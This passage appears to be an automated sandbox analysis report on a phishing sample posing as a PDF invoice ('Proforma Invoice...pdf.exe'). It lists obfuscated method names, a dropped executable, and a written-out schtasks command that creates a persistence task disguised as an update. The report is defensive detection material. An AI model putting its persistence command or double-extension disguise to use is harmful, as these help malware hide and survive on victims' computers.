                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, dJ1K2TPU4XV9kX0MnP.csHigh entropy of concatenated method names: 'wpluM678MY', 'vktumfy8hx', 'rV9uKnrUch', 'VpMKqJ6613', 'xE5KzruSsR', 'HC7uDZvtjZ', 'ytYuEKJOME', 'j3ruXOC3oR', 'jR1upWFTbY', 'gC5ujIruZ0'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, cqvD2IEDHLfDgyRi5C4.csHigh entropy of concatenated method names: 'HUJLCYWxkD', 'IdtLNZ65lE', 'KTvL3MLaVu', 'w4ZLTEnqJU', 'UhdLQadhIR', 'dseLAdooKw', 'sPoL4gyp5G', 'dG6LWZNQP2', 'YUOLv4M4fi', 'pRhLwrZ2If'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, EdDmpYveGveFRZxH2X.csHigh entropy of concatenated method names: 'fwdmTs3sZq', 'oMAmAjrd3r', 'Cf1mWeLpNW', 'IJCmvsqWft', 'A8smZJNCCT', 'jnCmoNKf6b', 'kJjmVafF5B', 'MwYm60qUE9', 'NUlmLsEbet', 'aCnmd9pdbJ'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, J9uZ9VGmLkAX4WoGMQ.csHigh entropy of concatenated method names: 'Dispose', 'RA1E2dsbBt', 'osYXxM1qfb', 'cJ3TTTtPgj', 'pbREqeNumf', 'TDuEzDWi6Z', 'ProcessDialogKey', 'RZqXD3k9dO', 'MMLXEXGNq5', 'PSiXXPC64s'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, SQmkrkXI5yYejD0L3X.csHigh entropy of concatenated method names: 'XV831sTYu', 'qR5TWjoAc', 'JulAJ0P6A', 'KKP4EqEVM', 'j0OvcCwOI', 'IxDwAp7KD', 'cW4o8oKwU3n6ZuRc7Z', 'Hx5op5iCGsk4A9lUfN', 'h8ohfg78I68Hy72krF', 'XhP6rgrr2'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, tsnEr4m4SyVHvMYCMe.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'g2LX2XCtMw', 'TUwXqS76Nf', 'YdjXz2O4ab', 'KBopDMGllN', 'gDwpEXfAZB', 'Ws5pXdvMqP', 'V6wpp1TM8L', 'W5QNXXOrGAIe4pDmxl0'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, KC64sAqGbrjZe1662T.csHigh entropy of concatenated method names: 'n02LEIKBJ9', 'iqOLpvY8k1', 'n9dLjojpJR', 'VMmLM1jI2k', 'f9ELGE4Ldb', 'V3TLYjRlEf', 'MxILKCYp8P', 'Rd46kpRpfr', 'A2Z6UoB5aC', 'WlG62mIZek'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, eQjOTlbmmrvKchYnEJ.csHigh entropy of concatenated method names: 'ToString', 'k9do5wHINY', 'Mkwox1ZIo3', 'jLdoRF6P6Q', 'PbeotxFfWF', 'HQyo1ZY8nl', 'yL3ocd56Ve', 'pHsoP2GfLo', 'ueLoJImfH0', 'MZaoept2FS'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, ck8cvCwbqF41UZ9PeZ.csHigh entropy of concatenated method names: 'DF0YQ7huA3', 'Ua2Y4wJmbY', 'E2FmRvxbhN', 'PFhmtxywhv', 'uHqm1pMIFO', 'Uoumc1lq13', 'P6HmPGWDx1', 'k9nmJk4LOn', 'k6xmeqbH6T', 'kbtm81lHJV'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, SReNumUfgDuDWi6ZHZ.csHigh entropy of concatenated method names: 'Hbw6MuU5xc', 'VyE6GGj0L4', 'vB16m1iLjm', 'udm6YRNeV1', 'byl6KgM6gH', 'cQl6u4JH2u', 'Jxo60VRhcV', 'g2j6FPU3qw', 'awh6rP2ZIj', 'rRU6BfLM23'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, mhimEujUKu7M0BJFWx.csHigh entropy of concatenated method names: 'TmQEu9CVxT', 'YZbE0L9COx', 'ieGErveFRZ', 'HH2EBXpk8c', 'o9PEZeZkXd', 'lbsEoTWAme', 'JanQInV25FumL089oA', 'K4pxPZ1gMOW0eirJIU', 'rpDEEeOXiT', 'tpKEpX9L3B'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, DALH0Ea91JySiQTHL0.csHigh entropy of concatenated method names: 'qiPVUAHgNa', 'uKTVqEFScy', 'Nma6D1oaLx', 'jJ16EutHxf', 'DBHV5iv5Im', 'I0QVyJBNjK', 'oFDVlvhGUR', 'k7KVHZ074d', 'jPgVsJsy0q', 'HZDVbuIwoM'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, h95BIkejnF9uJ8Ra5v.csHigh entropy of concatenated method names: 'MZyuCUWfDg', 'ttIuNmGNkX', 'Lkpu3FGv8w', 'mXBuTksGZR', 'sgMuQt0RtC', 'l2fuAcInD7', 'VQju40IKNa', 'z9wuWNkump', 'fsjuv5KG2D', 'kiiuwRampG'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, Y3k9dO2eMLXGNq5ySi.csHigh entropy of concatenated method names: 'lZI6Ifod5k', 'PKB6x9W0pw', 'zyg6RKypGt', 'hxY6tvJdKI', 'jw26H9950v', 'R5P61HpwAL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, B9CVxTWqZbL9COxYSC.csHigh entropy of concatenated method names: 'ARVGHI5TDq', 'ch1GseZ7pl', 'H8BGbK7qdj', 'CE7GgmITns', 'tP0GSK4mXD', 'g2sGaI4QgJ', 'ub0GkbJ6Mp', 'DamGUTA5Yv', 'qfeG2if0Kf', 'HsDGq4LQAX'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, VXdFbsITWAmen4IAUk.csHigh entropy of concatenated method names: 'lppKhvt69n', 'jI0KGwBlqb', 'EPxKY0T4a6', 'AhRKujZwqt', 'HVqK0KbWe6', 'do1YSFtIOy', 'ihxYaD9pa3', 'Ij9YkZALfV', 'iV5YU73sf2', 'Ik7Y2Xe9FD'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, svHqcNluLpvGPX5ECE.csHigh entropy of concatenated method names: 'Bdp9W7gyeg', 'fUs9vTMmxI', 'PxE9IsdxRJ', 'HlB9xTkFnb', 'GI29ta2eW4', 'Ju491GXMCr', 'SaH9PWyqvq', 'pbg9JfYDgw', 'C0Z98ocJLy', 'YdY95H71NY'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, R6t6WaEpRUJ1DtPHOLl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dPbdHhnqyy', 'INUdss5pj8', 'uWwdbmGEmR', 'BjjdgN3JDE', 'MhTdSu989h', 'cUZdaccBtv', 'Rp6dkYRZ8A'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, wvrdGM0ZpKZGfbxjQ7.csHigh entropy of concatenated method names: 'nH8phE8rwk', 'oeTpM1O1A7', 'mU4pG6qJmw', 'felpmSeUdG', 'uAlpYFPXtO', 'Kt3pKXI8BJ', 'NPnpuNfCgd', 'N1pp03OVpY', 'neupFx2aBY', 'nI6prEkTRp'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, gQF5JWzxeqciQn3QRX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IjWL9n974P', 'wv1LZkqgmv', 'o56LoKkkya', 'XkjLVkH1C8', 'WkUL6TIXkw', 'f9VLLKcNvy', 'tvILdAc8SF'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, dJ1K2TPU4XV9kX0MnP.csHigh entropy of concatenated method names: 'wpluM678MY', 'vktumfy8hx', 'rV9uKnrUch', 'VpMKqJ6613', 'xE5KzruSsR', 'HC7uDZvtjZ', 'ytYuEKJOME', 'j3ruXOC3oR', 'jR1upWFTbY', 'gC5ujIruZ0'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, cqvD2IEDHLfDgyRi5C4.csHigh entropy of concatenated method names: 'HUJLCYWxkD', 'IdtLNZ65lE', 'KTvL3MLaVu', 'w4ZLTEnqJU', 'UhdLQadhIR', 'dseLAdooKw', 'sPoL4gyp5G', 'dG6LWZNQP2', 'YUOLv4M4fi', 'pRhLwrZ2If'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, EdDmpYveGveFRZxH2X.csHigh entropy of concatenated method names: 'fwdmTs3sZq', 'oMAmAjrd3r', 'Cf1mWeLpNW', 'IJCmvsqWft', 'A8smZJNCCT', 'jnCmoNKf6b', 'kJjmVafF5B', 'MwYm60qUE9', 'NUlmLsEbet', 'aCnmd9pdbJ'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, J9uZ9VGmLkAX4WoGMQ.csHigh entropy of concatenated method names: 'Dispose', 'RA1E2dsbBt', 'osYXxM1qfb', 'cJ3TTTtPgj', 'pbREqeNumf', 'TDuEzDWi6Z', 'ProcessDialogKey', 'RZqXD3k9dO', 'MMLXEXGNq5', 'PSiXXPC64s'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, SQmkrkXI5yYejD0L3X.csHigh entropy of concatenated method names: 'XV831sTYu', 'qR5TWjoAc', 'JulAJ0P6A', 'KKP4EqEVM', 'j0OvcCwOI', 'IxDwAp7KD', 'cW4o8oKwU3n6ZuRc7Z', 'Hx5op5iCGsk4A9lUfN', 'h8ohfg78I68Hy72krF', 'XhP6rgrr2'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, tsnEr4m4SyVHvMYCMe.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'g2LX2XCtMw', 'TUwXqS76Nf', 'YdjXz2O4ab', 'KBopDMGllN', 'gDwpEXfAZB', 'Ws5pXdvMqP', 'V6wpp1TM8L', 'W5QNXXOrGAIe4pDmxl0'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, KC64sAqGbrjZe1662T.csHigh entropy of concatenated method names: 'n02LEIKBJ9', 'iqOLpvY8k1', 'n9dLjojpJR', 'VMmLM1jI2k', 'f9ELGE4Ldb', 'V3TLYjRlEf', 'MxILKCYp8P', 'Rd46kpRpfr', 'A2Z6UoB5aC', 'WlG62mIZek'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, eQjOTlbmmrvKchYnEJ.csHigh entropy of concatenated method names: 'ToString', 'k9do5wHINY', 'Mkwox1ZIo3', 'jLdoRF6P6Q', 'PbeotxFfWF', 'HQyo1ZY8nl', 'yL3ocd56Ve', 'pHsoP2GfLo', 'ueLoJImfH0', 'MZaoept2FS'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, ck8cvCwbqF41UZ9PeZ.csHigh entropy of concatenated method names: 'DF0YQ7huA3', 'Ua2Y4wJmbY', 'E2FmRvxbhN', 'PFhmtxywhv', 'uHqm1pMIFO', 'Uoumc1lq13', 'P6HmPGWDx1', 'k9nmJk4LOn', 'k6xmeqbH6T', 'kbtm81lHJV'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, SReNumUfgDuDWi6ZHZ.csHigh entropy of concatenated method names: 'Hbw6MuU5xc', 'VyE6GGj0L4', 'vB16m1iLjm', 'udm6YRNeV1', 'byl6KgM6gH', 'cQl6u4JH2u', 'Jxo60VRhcV', 'g2j6FPU3qw', 'awh6rP2ZIj', 'rRU6BfLM23'
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeFile created: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Uses an obfuscated file name to hide its real file extension (double extension)
                Source: Possible double extension: pdf.exeStatic PE information: Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
